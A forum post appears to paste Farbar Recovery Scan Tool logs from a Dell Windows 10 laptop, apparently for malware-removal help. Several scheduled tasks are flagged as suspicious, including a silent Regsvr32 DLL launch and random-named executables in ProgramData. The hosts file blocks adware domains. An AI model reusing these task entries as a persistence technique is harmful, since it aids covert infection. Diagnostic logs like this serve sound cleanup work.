2017-06-10 07:05 - 2017-03-18 17:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-06-10 07:00 - 2016-08-21 19:17 - 00000000 ____D C:\WINDOWS\SysWOW64\sda
2017-06-10 01:36 - 2017-03-18 17:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-06-10 01:29 - 2017-03-18 17:06 - 00000000 ____D C:\WINDOWS\Setup
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ___RD C:\Program Files\Windows Defender
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-06-10 01:28 - 2017-03-18 07:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-06-09 22:20 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\rescache
2017-06-09 22:13 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-06-09 22:13 - 2017-03-18 07:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-06-09 22:10 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\Registration
2017-06-09 22:04 - 2017-03-18 22:31 - 00000000 ____D C:\WINDOWS\HoloShell
2017-06-09 22:04 - 2016-08-21 15:56 - 00022840 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-06-09 22:02 - 2017-03-18 17:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-06-09 21:55 - 2017-05-23 21:51 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-06-09 21:55 - 2016-11-18 10:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2017-06-09 21:55 - 2016-04-12 16:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools
2017-06-09 21:55 - 2016-04-12 16:36 - 00000000 ____D C:\WINDOWS\system32\nn-NO
2017-06-09 21:55 - 2016-04-12 16:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell Audio
2017-06-09 21:55 - 2016-04-12 16:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2017-06-09 21:54 - 2016-08-21 18:27 - 00000000 ____D C:\Users\Default.migrated
2017-06-09 21:48 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2017-06-09 21:48 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-06-09 21:48 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-06-09 21:48 - 2017-03-18 17:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-06-09 21:48 - 2017-02-16 22:31 - 00000000 ____D C:\WINDOWS\SysWOW64\Dell
2017-06-09 21:47 - 2017-03-18 17:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-06-09 21:46 - 2015-10-30 03:24 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2017-06-09 21:42 - 2017-03-18 07:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-06-05 20:29 - 2016-04-12 16:32 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-06-03 02:32 - 2017-03-18 17:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-06-03 02:32 - 2017-03-18 17:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl

==================== Files in the root of some directories =======

2017-06-06 20:29 - 2017-06-06 20:29 - 0000044 _____ () C:\Users\Herbert Holland\AppData\Roaming\WB.CFG
2017-06-09 21:41 - 2017-06-09 21:41 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Some files in TEMP:
====================
2017-06-22 16:22 - 2017-06-22 16:23 - 7178424 _____ (VS Revo Group ) C:\Users\Herbert Holland\AppData\Local\Temp\VSUSetup.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-06-22 17:18

==================== End of FRST.txt ============================

 

[RichH]

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-07-2017
Ran by Herbert Holland (03-07-2017 12:57:59)
Running from C:\Users\Herbert Holland\Desktop
Windows 10 Home Version 1703 (X64) (2017-06-10 02:15:46)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-38309054-1687653055-3029875360-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-38309054-1687653055-3029875360-503 - Limited - Disabled)
Guest (S-1-5-21-38309054-1687653055-3029875360-501 - Limited - Disabled)
Herbert Holland (S-1-5-21-38309054-1687653055-3029875360-1001 - Administrator - Enabled) => C:\Users\Herbert Holland

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Citrix Online Launcher (HKLM-x32\...\{97C200CA-BF24-41B9-B111-A7E47F8FD57E}) (Version: 1.0.456 - Citrix)
Dell Customer Connect (HKLM-x32\...\{4FA72FF9-DD64-43A8-8704-6380A11F11D5}) (Version: 1.4.15.0 - Dell Inc.)
Dell Data Vault (HKLM\...\{2E55EEFD-2162-4A7D-9158-EDB0305603A6}) (Version: 4.4.2.0 - Dell Inc.) Hidden
Dell Digital Delivery (HKLM-x32\...\{AB7F2792-2ED1-4C5C-9F28-680E5110BF72}) (Version: 3.1.1018.0 - Dell Products, LP)
Dell Foundation Services (HKLM\...\{BDB50421-E961-42F3-B803-6DAC6F173834}) (Version: 3.4.16100.0 - Dell Inc.)
Dell Help & Support (HKLM\...\{E8669F4E-F2BE-48A9-B5A5-0BC12CA4CB4F}) (Version: 2.4.18.0 - Dell Inc.) Hidden
Dell Help & Support (HKLM-x32\...\InstallShield_{E8669F4E-F2BE-48A9-B5A5-0BC12CA4CB4F}) (Version: 2.4.18.0 - Dell Inc.)
Dell Product Registration (HKLM-x32\...\InstallShield_{48114909-3C3B-43E6-BF98-AE9C396500A3}) (Version: 3.0.127.0 - Dell Inc.)
Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.3.6855.212 - Dell)
Dell SupportAssistAgent (HKLM-x32\...\{A10101BE-714B-42EE-B88B-5D3725B61425}) (Version: 1.4.2.2 - Dell)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 19.0.15.15 - Synaptics Incorporated)
Dell Update - SupportAssist Update Plugin (HKLM\...\{EEA45885-F3E3-4E7D-8435-E9C21D36C141}) (Version: 3.0.0.2840 - Dell Inc.)
Dell Update (HKLM-x32\...\{2BE9948C-FD9C-40B0-AC04-EE2AAB4C19D4}) (Version: 1.8.1114.0 - Dell Inc.)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.)
Dropbox 20 GB (HKLM-x32\...\{0867A88D-764F-366E-9E21-130DA8B472C3}) (Version: 3.1.18.0 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.59.1 - Dropbox, Inc.) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 59.0.3071.115 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
GoToAssist Customer 3.1.0.1251 (HKLM-x32\...\GoToAssist Express Customer) (Version: 3.1.0.1251 - Citrix Online)
Intel(R) Chipset Device Software (HKLM-x32\...\{60c073df-e736-4210-9c3a-5fc2b651cef3}) (Version: 10.1.1.7 - Intel(R) Corporation) Hidden
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.15.4256 - Intel Corporation)
Intel(R) Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 2.0.0.1067 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{84DB01CB-7EB7-4261-9249-99A32768D991}) (Version: 1.0.0.523 - Intel Corporation)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Maxx Audio Installer (x64) (HKLM\...\{307032B2-6AF2-46D7-B933-62438DEB2B9A}) (Version: 2.6.6570.2 - Waves Audio Ltd.) Hidden
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.8201.2102 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-38309054-1687653055-3029875360-1001\...\OneDriveSetup.exe) (Version: 17.3.6917.0607 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.8201.2102 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.8201.2102 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.8201.2102 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.8201.2075 - Microsoft Corporation) Hidden
Product Registration (HKLM\...\{48114909-3C3B-43E6-BF98-AE9C396500A3}) (Version: 3.0.127.0 - Dell Inc.) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 10.0.1.0 - Qualcomm Atheros)
QuickSet64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.31 - Dell Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.31213 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7654 - Realtek Semiconductor Corp.)
Realtek USB Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{04201224-2B34-4EE7-862B-B7BBF89DB3AB}) (Version: 10.1.506.2015 - Realtek)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
Windows Driver Package - Intel Corporation (iagpioe) System (05/21/2015 604.10120.2652.361) (HKLM\...\AF9226384B030787C4D0F761A23F48F7649D6D17) (Version: 05/21/2015 604.10120.2652.361 - Intel Corporation)
Windows Driver Package - Intel Corporation (iai2ce) System (05/21/2015 604.10120.2654.367) (HKLM\...\B37036F6A0766DAC3E418F6CAE67005C5F3A8C40) (Version: 05/21/2015 604.10120.2654.367 - Intel Corporation)
Windows Driver Package - Intel Corporation (iauarte) System (05/21/2015 604.10120.2653.391) (HKLM\...\1D4FF76A05A14FF5BA3636A41E0AB237F3A55E14) (Version: 05/21/2015 604.10120.2653.391 - Intel Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ContextMenuHandlers03: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes)
ContextMenuHandlers05: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers05: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2015-09-09] (Intel Corporation)
ContextMenuHandlers06: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes)
ContextMenuHandlers06: [PintoStartScreen] -> {470C0EBD-5D73-4d58-9CED-E91E22E23282} => C:\Windows\System32\appresolver.dll [2017-06-10] (Microsoft Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {07EC7B9F-0A90-45EB-8BB2-E35B533D62A0} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-18] (Dropbox, Inc.)
Task: {0AD30D12-D92B-434A-93CD-8D0838A7E32D} - \{08047847-0909-087E-0E11-0D090D0D117F} -> No File <==== ATTENTION
Task: {1740F8A7-B1E3-4A6E-85F3-6A600F4EE159} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-06-10] (Microsoft Corporation)
Task: {2BCF15C0-4EEB-4AE9-A4C3-52FCD08A03A5} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {384DACBD-A60E-4E12-9255-81F82525401D} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-18] (Dropbox, Inc.)
Task: {44DA1264-931F-48B4-8E99-657B3614D05D} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe
Task: {577037E2-4F56-41C2-8FAD-FAF276B42126} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-06-10] (Microsoft Corporation)
Task: {6458FECC-36A5-4AEA-BE85-AB6581097D9F} - System32\Tasks\{A0D2D779-C325-C9CD-794C-617EE523AB5C} => Regsvr32.exe /s /n /I:"/rt" "C:\PROGRA~3\e26b0e7f\ffe3a8c0.dll" <==== ATTENTION
Task: {656E6231-99E5-4619-A457-F81BCE2B5001} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-06-18] ()
Task: {6AC75941-90E1-4B12-B60D-07275B79FFBF} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-08-21] (Google Inc.)
Task: {6C1259C2-2732-4064-AFED-12D37A57A748} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-11-06] (Realtek Semiconductor)
Task: {6DA17504-53DA-44C0-BED3-474B999AC1E4} - System32\Tasks\{C1EFB248-7644-05E3-D1E7-66E55CB86A44} => C:\ProgramData\{3419C417-83B2-73BC-E0EC-187B8EED1004}\AE70C747-19DB-70EC-3236-D9A0F56E1161.exe <==== ATTENTION
Task: {80B40B72-AF17-4335-9D7E-9528922A518B} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe [2017-04-18] (PC-Doctor, Inc.)
Task: {9CC45A00-BF9D-4979-85EF-BD352F13344D} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2016-09-21] ()
Task: {9E435D2B-0128-4FE8-BC3B-2CFA9A053A3C} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-08-21] (Google Inc.)
Task: {A6B3DB1E-9CB3-4B9A-912E-6E3B830430D5} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\Dell\SupportAssist\uaclauncher.exe [2017-04-18] (PC-Doctor, Inc.)
Task: {B2FA9B14-8A10-4B26-AF19-9BC1AE760332} - System32\Tasks\{49450373-FEEE-B4D8-F18A-86EC30A422FF} => C:\ProgramData\{5F6F0F4E-E8C4-B8E5-5392-6D650E5BFB29}\3577CAE2-82DC-7D49-3C8F-3C7CFCD19C8B.exe <==== ATTENTION
Task: {B83CB3AD-5C8D-4BE3-8685-E154A749A408} - System32\Tasks\SystemToolsDailyTest-Retry => uaclauncher.exe
Task: {DEC8DEBF-BB8F-44BD-B518-C25457292957} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe [2017-04-25] (Dell Inc.)
Task: {E0156F32-2369-4C0C-80EC-47794CC43783} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-06-18] ()
Task: {EA92DAEA-AE4D-4CEE-A840-589E3E26D50C} - System32\Tasks\PCDoctorBackgroundMonitorTask-Retry => C:\Program Files\Dell\SupportAssist\uaclauncher.exe [2017-04-18] (PC-Doctor, Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\RunDLC.job => cmd /c sc start Dell Help Support WORKGROUP DESKTOP 47E6V0K

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


ShortcutWithArgument: C:\Users\Herbert Holland\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic

==================== Loaded Modules (Whitelisted) ==============

2017-03-18 16:58 - 2017-03-18 16:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2016-04-12 16:53 - 2017-06-18 07:58 - 08931008 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2017-03-18 16:59 - 2017-03-18 22:31 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-04-12 16:49 - 2015-09-09 17:25 - 00395880 _____ () C:\WINDOWS\system32\igfxTray.exe
2015-02-26 13:12 - 2015-02-26 13:12 - 00330240 _____ () C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe
2017-05-15 21:35 - 2017-05-09 05:13 - 03767640 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\libglesv2.dll
2017-05-15 21:35 - 2017-05-09 05:13 - 00100696 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\libegl.dll
2016-12-21 11:24 - 2016-12-21 11:24 - 00134008 _____ () C:\Program Files (x86)\Dell Customer Connect\ServiceTagPlusPlus.dll
2015-06-23 19:26 - 2015-06-23 19:26 - 00155888 _____ () c:\Program Files (x86)\Dell Digital Delivery\ServiceTagPlusPlus.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-38309054-1687653055-3029875360-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-38309054-1687653055-3029875360-1001\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-10-30 03:24 - 2017-06-22 16:06 - 00002024 _____ C:\WINDOWS\system32\Drivers\etc\hosts

0.0.0.0 0.0.0.0 # fix for traceroute and netstat display anomaly
0.0.0.0 tracking.opencandy.com.s3.amazonaws.com
0.0.0.0 media.opencandy.com
0.0.0.0 cdn.opencandy.com
0.0.0.0 tracking.opencandy.com
0.0.0.0 api.opencandy.com
0.0.0.0 api.recommendedsw.com
0.0.0.0 installer.betterinstaller.com
0.0.0.0 installer.filebulldog.com
0.0.0.0 d3oxtn1x3b8d7i.cloudfront.net
0.0.0.0 inno.bisrv.com
0.0.0.0 nsis.bisrv.com
0.0.0.0 cdn.file2desktop.com
0.0.0.0 cdn.goateastcach.us
0.0.0.0 cdn.guttastatdk.us
0.0.0.0 cdn.inskinmedia.com
0.0.0.0 cdn.insta.oibundles2.com
0.0.0.0 cdn.insta.playbryte.com
0.0.0.0 cdn.llogetfastcach.us
0.0.0.0 cdn.montiera.com
0.0.0.0 cdn.msdwnld.com
0.0.0.0 cdn.mypcbackup.com
0.0.0.0 cdn.ppdownload.com
0.0.0.0 cdn.riceateastcach.us
0.0.0.0 cdn.shyapotato.us
0.0.0.0 cdn.solimba.com
0.0.0.0 cdn.tuto4pc.com
0.0.0.0 cdn.appround.biz
0.0.0.0 cdn.bigspeedpro.com
0.0.0.0 cdn.bispd.com

There are 4 more lines.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-38309054-1687653055-3029875360-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\dell\BlueLava_1112000xx_inspiron_wallpaper58095_16x9_72dpi_RGB.jpg
DNS Servers: 192.168.100.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

HKLM\...\StartupApproved\Run: => "RtHDVBg"
HKLM\...\StartupApproved\Run: => "WebDiscoverBrowser"
HKLM\...\StartupApproved\Run: => "QuickSet"
HKLM\...\StartupApproved\Run: => "WavesSvc"
HKU\S-1-5-21-38309054-1687653055-3029875360-1001\...\StartupApproved\Run: => "Chromium"
HKU\S-1-5-21-38309054-1687653055-3029875360-1001\...\StartupApproved\Run: => "Interstatnogui"
HKU\S-1-5-21-38309054-1687653055-3029875360-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-38309054-1687653055-3029875360-1001\...\StartupApproved\Run: => "Web Companion"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{816D282F-5F25-4232-8B8A-F198C2A77AFD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{1B194384-4C82-4FF1-AB0B-6E290C9A4CD2}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

10-06-2017 07:35:35 Windows Update
18-06-2017 08:37:23 Windows Update
22-06-2017 22:52:29 Windows Update

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (06/24/2017 07:10:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MicrosoftEdgeCP.exe, version: 11.0.15063.332, time stamp: 0x591fd994
Faulting module name: OLEAUT32.dll, version: 10.0.15063.332, time stamp: 0xc76efb2b
Exception code: 0xcfffffff
Fault offset: 0x000000000000cf59
Faulting process id: 0x2ab4
Faulting application start time: 0x01d2ed3e9dcc934d
Faulting application path: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
Faulting module path: C:\WINDOWS\System32\OLEAUT32.dll
Report Id: 0c3a3b9d-c63c-4a31-902b-7ac3e888eac1
Faulting package full name: Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe
Faulting package-relative application ID: ContentProcess

Error: (06/24/2017 07:06:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MicrosoftEdgeCP.exe, version: 11.0.15063.332, time stamp: 0x591fd994
Faulting module name: ntdll.dll, version: 10.0.15063.0, time stamp: 0xb79b6ddb
Exception code: 0xcfffffff
Fault offset: 0x0000000000096392
Faulting process id: 0x3b0
Faulting application start time: 0x01d2ed3da1cc89af
Faulting application path: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 01197c29-d668-4eef-b749-25e831477bb0
Faulting package full name: Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe
Faulting package-relative application ID: ContentProcess

Error: (06/24/2017 06:57:59 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: DESKTOP-47E6V0K)
Description: Package Microsoft.Windows.ShellExperienceHost_10.0.15063.332_neutral_neutral_cw5n1h2txyewy+App was terminated because it took too long to suspend.

Error: (06/23/2017 09:12:47 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: DESKTOP-47E6V0K)
Description: Package Microsoft.Windows.ShellExperienceHost_10.0.15063.332_neutral_neutral_cw5n1h2txyewy+App was terminated because it took too long to suspend.

Error: (06/22/2017 09:12:38 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 512) (User: )
Description: The Cryptographic Services service failed to initialize the VSS backup "System Writer" object.

Details:
Could not query the status of the EventSystem service.

System Error:
A system shutdown is in progress.
.

Error: (06/22/2017 05:42:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program mbam.exe version 2.3.173.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

Process ID: f8c

Start Time: 01d2eba046375e2a

Termination Time: 38

Application Path: C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

Report Id: 311fae0a-81ef-4726-a66f-b8ae1d76204b

Faulting package full name:

Faulting package-relative application ID:

